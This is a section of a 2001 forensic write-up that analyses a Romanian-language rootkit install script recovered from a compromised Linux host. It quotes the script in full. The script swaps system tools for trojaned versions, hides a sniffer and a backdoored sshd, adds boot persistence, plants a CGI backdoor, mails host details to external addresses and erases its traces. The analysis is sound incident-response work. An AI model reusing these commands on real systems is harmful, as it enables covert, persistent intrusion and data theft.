next up previous
Next: Looks like... Up: Short analysis of the Previous: Short analysis of the

The install script

After a short examination of the recovered folder, I found that the file install (inode 2041) is very interesting.

install is a shell script that is executed after the system is compromised. It does, in order:

  1. Announce itself and checks if make, gcc and ssh are present in their default location.

    
    #!/bin/sh
    clear
    unset HISTFILE
    echo    "********* Instalarea Rootkitului A Pornit La Drum *********"
    echo    "********* Mircea SUGI PULA ********************************"
    echo    "********* Multumiri La Toti Care M-Au Ajutat **************" 
    echo    "********* Lemme Give You A Tip : **************************"
    echo    "********* Ignore everything, call your freedom ************"
    echo    "********* Scream & swear as much as you can ***************"
    echo    "********* Cuz anyway nobody will hear you and no one will *"
    echo    "********* Care about you **********************************"
    echo
    echo
    chown root.root *
    if [ -f /usr/bin/make ]; then
        echo "Are Make !"
    else
        echo "Nu Are Make !"
    fi
    if [ -f /usr/bin/gcc ]; then
        echo "Are Gcc !"
    else
        echo "Nu Are Gcc !"
    fi
    if [ -f /usr/sbin/sshd/ ]; then
        echo "Are Ssh !"
    else 
        echo "Nu Are Ssh !"
    fi
    

    Strangely, the scripts does not need make, gcc or sshd. It makes the tests just to inform the luser that they are present.

  2. Installs trojaned versions of ifconfig, netstat, ps and top. Also installs a program called mkxfs.

    
    echo -n "* Inlocuim nestat ... alea alea "
    rm -rf /sbin/ifconfig
    mv ifconfig /sbin/ifconfig
    rm -rf /bin/netstat
    mv netstat /bin/netstat
    rm -rf /bin/ps
    mv ps /bin/ps
    rm -rf /usr/bin/top
    mv top /usr/bin/top
    cp -f mkxfs /usr/sbin/
    echo "* Gata..."
    echo -n "* Dev... "
    echo
    echo
    

  3. Creates files /dev/rpm and /dev/last

    
    touch /dev/rpm >/dev/rpm
    echo "3 sl2" >>/dev/rpm
    echo "3 sshdu" >>/dev/rpm
    echo "3 linsniffer" >>/dev/rpm
    echo "3 smurf" >>/dev/rpm
    echo "3 slice" >>/dev/rpm
    echo "3 mech" >>/dev/rpm
    echo "3 muh" >>/dev/rpm
    echo "3 bnc" >>/dev/rpm
    echo "3 psybnc" >> /dev/rpm
    touch /dev/last >/dev/last
    echo "1 193.231.139" >>/dev/last
    echo "1 213.154.137" >>/dev/last
    echo "1 193.254.34" >>/dev/last
    echo "3 48744" >>/dev/last
    echo "3 3666" >>/dev/last
    echo "3 31221" >>/dev/last
    echo "3 22546" >>/dev/last
    echo "4 48744" >>/dev/last
    echo "4 2222" >>/dev/last
    echo "* Gata"
    

    The file /dev/rpm looks like linux rootkit's (lrk) ps and top configuration files. The file /dev/last looks like lrk's netstat configuration file. This makes me think that the trojaned versions of ifconfig, netstat, ps and top are the same as the one present in linux rootkit.

  4. Creates folders /dev/ida/.drag-on and /dev/ida/".. " and installs, among other things, a sshd daemon and a portsniffer.

    
    echo "* Facem Director...Si Mutam Alea.. "
    mkdir -p /dev/ida/.drag-on
    mkdir -p /dev/ida/".. "
    echo "* Copiem ssh si alea"
    cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed \
    /dev/ida/.drag-on/
    cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed \
    /dev/ida/".. "
    rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed
    touch /dev/ida/.drag-on/tcp.log
    touch /dev/ida/".. "/tcp.log
    

    Here's a description of the files installed:
    linsniffer portsniffer
    logclear script to delete sniffer's log and restart linsniffer
    sense Sorts the output from LinSniffer
    sl2 DoS tool based on synk4 (my guess)
    mkxfs sshd daemon with a backdoor
    s sshd daemon configuration file
    ssh_host_key sshd daemon host key
    ssh_random_seed sshd daemon random seed

  5. Replaces /etc/inetd.conf and /etc/services by its own versions.

    
    cp -f inetd.conf /etc
    cp -f services /etc
    killall -HUP inetd
    echo 
    echo
    

    The new inetd.conf and services has been recovered as inode 2044 and 2046, respectivly, in the folder interestInodes.

  6. Modifies /etc/rc.d/rc.sysinit to run /usr/bin/lsattr on every boot.

    
    echo
    echo "* Adaugam In Startup:) ..."
    rm -rf /usr/bin/lsattr
    echo "/usr/bin/lsattr -t1 -X53 -p" >> /etc/rc.d/rc.sysinit
    echo >> /etc/rc.d/rc.sysinit
    

  7. Installs a shell script at /usr/bin/lsattr

    
    cp -f lsattr /usr/bin/
    chmod 500 /usr/bin/lsattr
    chattr +i /usr/bin/lsattr
    /usr/bin/lsattr
    
    sleep 1
    

    The file lsattr has been recovered from inode 2045 in the folder interestInodes:

    
    #!/bin/sh
    cd /dev/ida/.drag-on
    ./mkxfs -f ./s
    ./linsniffer >> ./tcp.log &
    cd /
    

  8. Tries to install a CGI backdoor last.cgi.

    
    if [ -d /home/httpd/cgi-bin ]
    then
    mv -f last.cgi /home/httpd/cgi-bin/
    fi
    
    if [ -d /usr/local/httpd/cgi-bin ]
    then
    mv -f last.cgi /usr/local/httpd/cgi-bin/
    fi
    
    if [ -d /usr/local/apache/cgi-bin ]
    then
    mv -f last.cgi /usr/local/apache/cgi-bin/
    fi
    
    if [ -d /www/httpd/cgi-bin ]
    then
    mv -f last.cgi /www/httpd/cgi-bin/
    fi
    
    if [ -d /www/cgi-bin ]
    then
    mv -f last.cgi /www/cgi-bin/
    fi
    

    The file last.cgi has been recovered from inode 2054 in the folder interestInodes.

  9. Sends an email to last@linuxmail.org and bidi_damm@yahoo.com containing infos about the compromised host.

    
    echo "* Luam Informatiile dorite ..."
    echo "* Info : $(uname -a)" >> computer
    echo "* Hostname : $(hostname -f)" >> computer
    echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> computer
    echo "* Uptime : $(uptime)" >> computer
    echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> computer
    echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> computer
    echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> computer
    echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> computer
    echo "* Spatiu Liber: $(df -h)" >> computer
    echo "* Gata ! Trimitem Mailul ...Asteapta Te Rog "
    cat computer | mail -s "placinte" last@linuxmail.org
    cat computer | mail -s "roote" bidi_damm@yahoo.com
    

  10. Cleans up after itself.

    
    echo "* Am trimis mailul ... stergem fisierele care nu mai trebuie ."
    echo
    echo
    echo "* G A T A *"
    echo
    echo "* That Was Nice Last "
    cd /
    rm -rf last lk.tgz computer lk.tar.gz
    

I went to romanian irc channels to get the Romanians sentences translated into english, but all I could get is a lot of DCC offers for IRC worms/virus. Well, it's a good way to know if your anti-virus is working... hi.


next up previous
Next: Looks like... Up: Short analysis of the Previous: Short analysis of the
Guillaume Filion
2001-05-21